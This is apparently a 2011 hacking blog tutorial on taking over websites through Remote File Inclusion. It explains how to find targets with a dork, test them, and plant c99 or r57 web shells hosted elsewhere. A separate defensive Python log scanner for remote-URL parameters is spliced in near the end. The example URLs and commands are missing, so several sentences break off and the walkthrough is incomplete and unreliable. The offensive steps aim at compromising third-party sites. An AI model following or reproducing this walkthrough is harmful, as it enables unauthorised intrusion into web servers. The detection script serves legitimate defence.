Monday, October 3, 2011

Hacking Website Using Remote File Inclusion

Welcome back to hacking-class. In this article I will cover Remote File Inclusion (RFI), one of the most common vulnerabilities found in web applications. This type of vulnerability allows an attacker to include a remote file on the web server. If the attack succeeds, the attacker gains access to the web server and can execute any command on it.

1 - Searching for the Vulnerability
A Remote File Inclusion vulnerability usually occurs in sites that have a URL similar to the one below
The Google Dork is
This will show all the pages which have “index.php?page=” in their URL. Now, to test whether the website is vulnerable to Remote File Inclusion or not, the hacker normally uses the following command

But since I am posting this here, the links must be a bit different :P

I found this site; it is very good for giving you an example

Now we want to check if it is vulnerable, so we type

Now this appears

A website opens inside another website; this means the website is vulnerable to RFI.

You can also type

and you will get similar results.

OK, now moving on to the next part...

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. 

The hacker would first upload the shells to a web hosting site such as, etc.
Now here is how a hacker would execute the shells to gain access. Let's say that the URL of the shell is.
Now here is how the hacker will execute the command on the website
Now voilà, we have executed the shell.

I will not explain how to run your scripts using the shell; try finding out yourself.

Note - Remember to add “?” at the end of the URL or else the shell will not execute.
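
A defender-side check for the requests described in this post, as an added example that is not part of the original article: it scans web access-log lines for query parameters (such as the `index.php?page=` one) whose value is an absolute remote URL, including the trailing “?” form. The log lines, IP addresses, hosts, scheme list and function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: these URL schemes are treated as "remote" for this check.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Request target inside a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, example domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Oct/2011:10:01:07 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-"',
    # Benign: the only URL on this line is the Referer, not a parameter value.
    '192.0.2.10 - - [03/Oct/2011:10:01:30 +0000] "GET /index.php?page=contact HTTP/1.1" 200 4100 "http://www.example.com/index.php?page=about"',
    '198.51.100.7 - - [03/Oct/2011:10:02:11 +0000] "GET /index.php?page=http://files.example.org/note.txt? HTTP/1.1" 200 7344 "-"',
    '198.51.100.7 - - [03/Oct/2011:10:02:40 +0000] "GET /index.php?page=http%3A%2F%2Ffiles.example.org%2Fnote.txt%3F HTTP/1.1" 200 7344 "-"',
]

def remote_include_params(request_target):
    """Return (name, value) pairs whose decoded value is an absolute remote URL."""
    hits = []
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; keep decoding (bounded) so nested
        # percent-encoding is normalised before matching.
        for _ in range(3):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if REMOTE_VALUE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return (client_ip, param, value) for every suspicious request line."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        for name, value in remote_include_params(match.group(1)):
            findings.append((client, name, value))
    return findings

if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client} sent remote URL in parameter {name!r}: {value}")
```

A hit on a redirect-style parameter can be legitimate traffic, so treat the output as a triage list and confirm against how the application actually uses each parameter.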

This is for educational purposes only; using this knowledge in an illegal way is strictly prohibited.


